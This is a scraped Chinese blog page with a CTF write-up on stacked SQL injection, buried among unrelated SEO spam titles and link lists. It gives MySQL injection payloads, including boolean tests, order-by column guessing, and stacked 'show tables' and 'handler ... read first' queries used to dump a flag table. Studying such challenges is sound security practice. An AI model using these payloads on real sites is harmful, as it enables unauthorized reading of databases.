当前位置: 首页 > news >正文

郑州市政府网站的建设与发展优化大师下载电脑版

郑州市政府网站的建设与发展,优化大师下载电脑版,免费网站建站排行榜,前端网页代码在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。 堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。 这个是攻防世界的一道CTF赛题。 采用寻常思路来寻找sql注入漏洞。 payload:1 and 11-- 利用payload: and 12…

在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。

堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。

这个是攻防世界的一道CTF赛题。

采用寻常思路来寻找sql注入漏洞。

payload:1' and 1=1--+

 

 

利用payload:' and 1=2--+

可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。

接下来就是手工注入的常见思路,利用order by来猜列。

payload:' order by 1--+

在这里我们可以猜测有两列数据。

那么接下来利用union select 进行查询

 

发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。

 

 

payload:1';show databases;--+

 

payload:' ;show tables;--+

看到一个及其奇怪的表。

 

在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。

 

payload:';handler `1919810931114514` open;handler `1919810931114514` read first;--+

在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。

附一个学习链接:【MySQL】MySQL 之 handler 的详细使用及说明 - 灰信网(软件开发博客聚合) 

 

 

 

http://www.hrbkazy.com/news/3835.html

相关文章:

  • 重庆网站建设只选承越阳江seo
  • 多久可以做网站合肥网站建设优化
  • wordpress 4.4 优化百度移动端关键词优化
  • wordpress站点标题副标题换行友情链接也称为
  • 网站模板 免费玄幻小说百度风云榜
  • 常用的做网站的工具都有哪些域名注册费用
  • 免费推广方案短视频矩阵seo系统源码
  • 网站怎么添加二级域名营销方式和渠道有哪些
  • 北京专业网站维护公司搜索引擎营销的五大特点
  • java web 网站开发基础新余seo
  • 迈网科技 官方网站建个人网站的详细步骤
  • 多站点wordpress安装seo专员是干什么的
  • 武汉做网站jw100免费网页空间到哪申请
  • 专门做网页的网站seo常用工具包括
  • 烟台开发区网站制作公司优化网站标题名词解释
  • 网站后台上传文件管理0kb网站维护中
  • b2b电子商务网站的主要类型有哪些长尾关键词什么意思
  • 建美食网站有哪些原因网上销售都有哪些平台
  • 网站标题图片怎么做关键词挖掘站网
  • 网站建设中高低端区别网址查询服务中心
  • 江宁做网站电商网站建设公司
  • 网站备案怎么改东莞营销网站建设直播
  • 企业做网站需要花多少钱竞价排名适合百度吗
  • 网站建设趋势网页推广方案
  • 手机网站建设的公司排名在百度上怎么卖自己的产品
  • 网站建设实训的目的常州seo
  • 如何做网站建设业务员百度网盘网页版入口官网
  • 怎么自己做三个一网站什么是推广
  • 酒店网站策划网上全网推广
  • 汇编做网站网站优化的方法与技巧